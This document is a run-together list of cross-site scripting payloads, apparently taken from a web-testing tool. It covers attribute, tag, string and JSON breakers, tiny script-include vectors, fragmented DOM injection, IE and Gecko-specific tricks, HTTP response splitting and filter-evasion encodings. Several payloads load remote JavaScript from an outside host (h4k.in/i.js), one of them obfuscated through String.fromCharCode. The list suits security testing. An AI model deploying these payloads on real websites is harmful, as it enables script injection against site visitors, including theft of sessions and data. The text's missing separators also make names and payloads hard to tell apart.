--- Reflective XSS Attacks ---Advanced XSS Locator';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//This is a modified version of the XSS Locator from ha.ckers.orgAdvanced XSS Locator for <title>-Injections';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}This is a modified version of the XSS Locator from ha.ckers.orgHTML Breaking XSS 1 (all quotes)'';!--"<script>alert(0);</script>=&{(alert(1))}HTML Breaker - tries to break the attribute injected inHTML Breaking XSS 2 (double quotes)"><script>alert(0);</script>HTML Breaker - tries to break the attribute injected inHTML Breaking XSS 3 (single quotes)'><script>alert(0);</script>HTML Breaker - tries to break the attribute injected inHTML Breaking XSS 4 (attributes)'<script>alert(0);</script>HTML Breaker - credits go to AlexSemicolon XSS (HTML)<img src=x onerror=;;alert(1) />HTML Breaker - credits go to KishorTitle-breaker</title><script>alert(1)</script>HTML-breaking XSS for backticked attributes`> <script>alert(5)</script>Textarea-breaker (onmouseover)</textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>Noscrript-breaker (onmouseover)</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>Style-breaker}</style><script>a=eval;b=alert;a(b(/i/.source));</script> --- Reflective JS XSS ---JS Breaking XSS 1;}alert(0);{JS Breaker - tries to break the javascript injected inJS Breaking XSS 2 (string concatination)"+alert(0)+"JS Breaker - tries to break the javascript injected inonerror XSS Injectionxyz onerror=alert(6); onclick XSS Injectiononclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);Plain JS XSS Injection 1a=eval;b=alert;a(b(8));Plain JS XSS Injection 2a=1;a=eval;b=alert;a(b(11));//String-breaking JS Injection (single qouted)';//%0da=eval;b=alert;a(b(9));//String-breaking JS Injection (double qouted)";//%0da=eval;b=alert;a(b(10));//String-breaking JS Injection (single qouted)'};a=eval;b=alert;a(b(13));//JSON-breaking JS Injection (double qouted)"};a=eval;b=alert;a(b(12));//JSON-breaking JS Injection (non-qouted)1};a=eval;b=alert;a(b(14));//Array-breaking JS Injection (sinlge qouted)'];a=eval;b=alert;a(b(15));//Array-breaking JS Injection (double qouted)"];a=eval;b=alert;a(b(16));//Array-breaking JS Injection (non qouted)1];a=eval;b=alert;a(b(17));//Int-breaking JS Injection (non qouted)1;a=eval;b=alert;a(b(/c/.source));CRLF-forced JS Injection%0da=eval;b=alert;a(b(/d/.source));JS Comment breaker*/a=eval;b=alert;a(b(/e/.source));/* --- JS Includes ---Tiny XSS Include 1 (20 characters, FFox only)<script src=//h4k.inSuper-tiny inclusion vector - 20 characters length.Tiny XSS Include 2 (27 characters - all browsers)<script src=http://h4k.in/>Super-tiny inclusion vector for IE, FFox and Opera - 27 characters length. Credits go to kogir.Tiny XSS Include 3 (30 characters - all browsers)<script src=//h4k.in></script>Tiny inclusion vector for IE, FFox and Opera - 30 characters length.Tiny XSS Include 4 (HTML Breaking)"><script src=//h4k.in></script><Tiny inclusion vector for IE, FFox and Opera - breaks HTML. --- Fragmented DOM XSS ---Include Fragment Pt. 1<scriFirst part of a fragmented inclusion attack vector. Swallows the enclosed HTML.Include Fragment Pt. 2pt src=//h4k.in><Second part of a fragmented inclusion attack vector.Include Fragment Pt. 3></script>Third part of a fragmented inclusion attack vector. --- HTML Injection ---Advanced HTML Injection Locator<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>HTML injection vector.HTML Injection 1 (http://h4k.in/i.js)"><script src=http://h4k.in/i.js></script>HTML injection vector.HTML Injection 2 (using JS - http://h4k.in/i.js)"><script>a=document.createElement('script');a.src='http://h4k.in/i.js';document.body.appendChild(a);</script>HTML injection vector.HTML Injection 3 (using charcode - http://h4k.in/i.js)"><script>eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))</script>HTML injection vector. --- Browser specific attacks ---IE VBScript injectionvbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))This works in IE only - use the PoC Link feature to test for this.IEIE expression injection" style="color: expression(alert(0));" a="This works in IE only - use the PoC Link feature to test for this.IEIE closing-tag expression injection</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">IEIE backticked semicolon injection<img src=`x` onrerror= ` ;; alert(1) ` />IEMozilla -moz-binding-url injection" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="This works in Gecko browsers only.GeckoMozilla -moz-binding-url injection (filter evading)" sstyle="foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="This works in Gecko browsers only. Was once used on php.netGecko --- Weird stuff ---HTTP Reponse Splitting XSS%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/HTTP response splitting vector with XSS alertNullbyte XSSc%00""<script>alert(0);</script> --- Style injections and hw/fw-encoding attacks ---BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")}BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")}x=alert;x(%26%2340 /finally through!/.source %26%2341);x=alert;x(%26%2340 /finally through!/.source %26%2341);%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// --- URL injection ---http://aa<script>alert(123)</script>http://aa<script>alert(123)</script>